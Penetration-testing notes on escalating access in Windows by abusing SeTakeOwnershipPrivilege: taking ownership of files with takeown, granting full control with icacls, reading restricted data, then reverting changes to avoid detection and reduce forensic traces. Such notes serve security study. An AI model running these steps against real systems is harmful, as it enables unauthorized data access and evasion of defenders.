Exploiting SeTakeOwnershipPrivilege

Overview

SeTakeOwnershipPrivilege allows a user to take ownership of files and folders, enabling modification of access control lists (ACLs) to gain unauthorized access to restricted data.

Approach

1. Verify Privileges

whoami /priv  # Check for SeTakeOwnershipPrivilege

2. Enable Privilege (if required)

Use PowerShell scripts such as:

Enable-Privilege.ps1EnableAllTokenPrivs.ps1

3. Identify Target Files/Folders

Locate sensitive files and gather metadata:

Get-ChildItem -Path <directory> -Recurse  # Enumerate files
cmd /c dir /q  # Check file owner

4. Take Ownership of Target File

takeown /f <target>

OR using PowerShell:

Set-Acl -Path <target> -AclObject (Get-Acl <target>)

5. Modify ACLs to Gain Access

icacls <target> /grant <user>:F  # Full control to user

6. Access Data

cat <target>  # Read the file

OR:

type <target>

7. Revert Changes

Reset ownership and ACLs to avoid detection:

icacls <target> /reset

Tools & Techniques

Commands Used:

whoami /priv
takeown /f <target>
icacls <target> /grant <user>:F
Get-ChildItem
cmd /c dir /q
cat <target> / type <target>
Set-Acl

Tools:

PowerShell scripts for privilege enabling

Techniques:

Use SeTakeOwnershipPrivilege to gain access to restricted files/folders.
Modify ACLs to grant read/write permissions.
Revert changes post-exploitation to avoid disruption.

Notes

This technique requires SeTakeOwnershipPrivilege to be enabled.
Always revert permissions and ownership post-exploitation to reduce forensic artifacts.

Previous6.Sedebugprivilege Next3.Windows Group Privileges

Last updated 8 months ago

hashtagOverview

hashtagApproach

hashtag1. Verify Privileges

hashtag2. Enable Privilege (if required)

hashtag3. Identify Target Files/Folders

hashtag4. Take Ownership of Target File

hashtag5. Modify ACLs to Gain Access

hashtag6. Access Data

hashtag7. Revert Changes

hashtagTools & Techniques

hashtagCommands Used:

hashtagTools:

hashtagTechniques:

hashtagNotes